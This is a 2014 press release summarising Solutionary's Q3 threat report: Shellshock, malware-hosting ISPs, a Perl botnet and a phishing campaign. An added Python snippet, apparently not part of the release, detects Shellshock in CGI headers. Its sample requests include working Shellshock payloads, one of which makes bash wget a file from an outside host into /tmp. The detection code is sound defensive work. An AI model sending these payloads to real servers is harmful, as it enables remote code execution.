SOURCE: Solutionary


October 30, 2014 08:00 ET

Amid High-Profile Breaches and Shellshock Disclosure, Solutionary SERT Q3 Threat Intelligence Report Reveals Inadequate Levels of Incident Response Preparedness

67 Percent of Shellshock Signatures Tied to Known Malicious Sources; Top ISPs Continue to Be Used as Malware Hosts

OMAHA, NE--(Marketwired - Oct 30, 2014) - Solutionary, an NTT Group security company (NYSE: NTT), and the next generation managed security services provider (MSSP), today announced the results of its Security Engineering Research Team (SERT) Quarterly Threat Intelligence Report for Q3, 2014. In the latest quarter, Solutionary SERT performed a broad analysis of the threat landscape, including information on the Shellshock and Aftershock vulnerabilities present in Bash. Despite the unprecedented levels of data breaches and mega-breach disclosures in the past year, Solutionary continues to observe inadequate levels of incident response preparedness.

This quarter's report reveals that more than 75 percent of the organizations the Solutionary SERT Incident Response Team assisted had neither an incident response team nor the policies and procedures needed to handle a cyber incident effectively. The Solutionary SERT also tracked the Shellshock disclosure closely and found that, as soon as 24 hours after the vulnerability was disclosed, 67 percent of the Shellshock signatures it observed were tied to known malicious actors. In addition, as follow-on research to data collected in Q4'13 and Q2'14, the report lists the top ten ISPs hosting malware. GoDaddy-hosted sites surged from two percent to 44 percent of observed malware hosting, reclaiming the number one spot from Amazon Web Services (AWS), whose share fell from 41 percent to 17 percent in Q3. The swing reflects how quickly and consistently the mix of hosting providers used to stage malware changes from quarter to quarter.
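The Shellshock signatures mentioned above match the trigger that Bash (CVE-2014-6271) and its incomplete-fix follow-ons such as CVE-2014-7169 share: an environment variable whose value begins with a function definition, `() {`. Web servers running CGI scripts copy request headers into the CGI environment (User-Agent becomes HTTP_USER_AGENT, and so on), which is how an attacker-controlled header reaches Bash. The following Python is an added example, not code from the report or from Solutionary; the request samples and the "known malicious" source list are constructed for illustration and do not reproduce the report's data.

```python
import re
from typing import Dict, List

# Shellshock trigger: a value that starts with a Bash function definition "() {".
# Whitespace between the tokens is optional, so a literal "() { :;};" string
# match misses variants such as "() {:;};". Anchored at the start of the value.
SHELLSHOCK_RE = re.compile(r"^\s*\(\s*\)\s*\{")

# Constructed source-reputation list for this example (not the report's data).
KNOWN_MALICIOUS_SOURCES = {"203.0.113.5"}


def cgi_env_from_request(remote_addr: str, headers: Dict[str, str]) -> Dict[str, str]:
    """Build the CGI meta-variables a server such as Apache mod_cgi exports:
    each request header becomes HTTP_<NAME> with dashes turned into underscores."""
    env = {"REMOTE_ADDR": remote_addr}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def find_shellshock_vars(env: Dict[str, str]) -> List[str]:
    """Names of environment variables whose value looks like a Bash function
    definition, i.e. the values Bash would have imported before the patch."""
    return sorted(name for name, value in env.items() if SHELLSHOCK_RE.match(value))


def classify_request(remote_addr: str, headers: Dict[str, str]) -> Dict[str, object]:
    """Flag a request as a Shellshock attempt and enrich it with source reputation.
    A hit means an attempt (or a scanner probe), not that the host is vulnerable."""
    hits = find_shellshock_vars(cgi_env_from_request(remote_addr, headers))
    return {
        "source": remote_addr,
        "shellshock_attempt": bool(hits),
        "vectors": hits,
        "known_malicious_source": remote_addr in KNOWN_MALICIOUS_SOURCES,
    }


# Constructed sample requests (not traffic from the report). The first is the
# classic User-Agent payload, the second is benign, the third hides the trigger
# in Referer and Cookie, the latter using the CVE-2014-7169 parser-bug variant.
SAMPLE_REQUESTS = [
    ("203.0.113.5", {"Host": "www.example.com",
                     "User-Agent": '() { :;}; /bin/bash -c "wget http://198.51.100.9/x -O /tmp/x"'}),
    ("198.51.100.7", {"Host": "www.example.com",
                      "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"}),
    ("192.0.2.44", {"User-Agent": "curl/7.37.0",
                    "Referer": "() {:;};echo vulnerable",
                    "Cookie": "() { (a)=>\\' bash -c \"echo date\""}),
]


def summarize(requests=SAMPLE_REQUESTS) -> Dict[str, int]:
    """Count attempts and how many came from sources already on the bad list."""
    results = [classify_request(addr, hdrs) for addr, hdrs in requests]
    attempts = [r for r in results if r["shellshock_attempt"]]
    return {
        "attempts": len(attempts),
        "from_known_malicious": sum(1 for r in attempts if r["known_malicious_source"]),
    }


if __name__ == "__main__":
    for addr, hdrs in SAMPLE_REQUESTS:
        print(classify_request(addr, hdrs))
    print(summarize())
```

Two caveats a practitioner should keep in mind: the check scans every header-derived variable, not just User-Agent, because scanners in 2014 also used Referer, Cookie and custom headers; and a match is evidence of an attempt against the HTTP/CGI vector only, so other routes into Bash (DHCP clients, SSH ForceCommand, other CGI-style gateways) need their own detection, and the only real remediation is the patched Bash package.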

"Organizations have been inundated with a constant flow of news about data breaches, so the frequency and magnitude of successful attacks actually comes as little surprise. The findings in the Q3 Threat Report highlight not only the challenges security teams are facing but also how little is being done to prepare businesses for these incidents," said Rob Kraus, SERT director of research, Solutionary. "Nearly three quarters of our team's incident response engagements showed minimal, even zero, preparation by IT teams when it came to identifying and remediating security events."

Other Key Topics Include:

Malware Distribution Analysis Updates

  • The United States had a seven percent increase in malware hosting, up to 63 percent, and kept the number-one rank among malware-hosting countries. Newcomers Spain and Switzerland entered the top 10, while China fell three percent as a host of malware and now appears at number four.

Threat Research Focus: Anatomy of a Web-Based Botnet

  • Botnets are increasingly able to enlist multiple device types and platforms, including Windows and Linux hosts, Web servers, workstations and more. Of the 1,900 unique IPs analyzed as part of a larger Perl-based botnet, 205 Web technologies were identified; 197 of these were PHP implementations, spanning 309 Web-server versions in 73 countries. Additionally, 47 percent of the top-targeted servers were Apache based.

Attacks on UDP Port 40000

  • The quarter saw a marked increase in probes against connectionless User Datagram Protocol (UDP) ports, especially from UDP Port 40000. Transmission Control Protocol (TCP) attacks did not disappear, however: 20 percent of the traffic directed at the Remote Desktop Protocol (RDP) originated from Morto Worm activity over TCP Port 6000.

Spear Phishing with VistaTeam

  • SERT researched a spear phishing campaign by a group dubbed "VistaTeam" because it abuses the free Web-hosting trial offered on the Vistaprint website. The attack is designed to evade many standard protections and targets companies that conduct wire transfers, with losses running to hundreds of thousands of dollars.

Readers will find several sections in the report that provide timely, actionable information they can use to help protect against today's most nefarious attack tactics and vectors.

To access a copy of the complete report, please visit:


About Solutionary
Solutionary, an NTT Group security company (NYSE: NTT), is the next generation managed security services provider (MSSP), focused on delivering managed security services, security consulting services and global threat intelligence. Comprehensive Solutionary security monitoring and security device management services protect traditional and virtual IT infrastructures, cloud environments and mobile data. Solutionary clients are able to optimize current security programs, make informed security decisions, achieve regulatory compliance and reduce costs. The patented, cloud-based ActiveGuard® service platform uses multiple detection technologies and advanced analytics to protect against advanced threats. The Solutionary Security Engineering Research Team (SERT) researches the global threat landscape, providing actionable threat intelligence, enhanced threat detection and mitigating controls. Experienced, certified Solutionary security experts act as an extension of clients' internal teams, providing industry-leading client service to global enterprise and mid-market clients in a wide range of industries, including financial services, healthcare, retail and government. Services are delivered 24/7 through multiple state-of-the-art Security Operations Centers (SOCs). 

Contact Information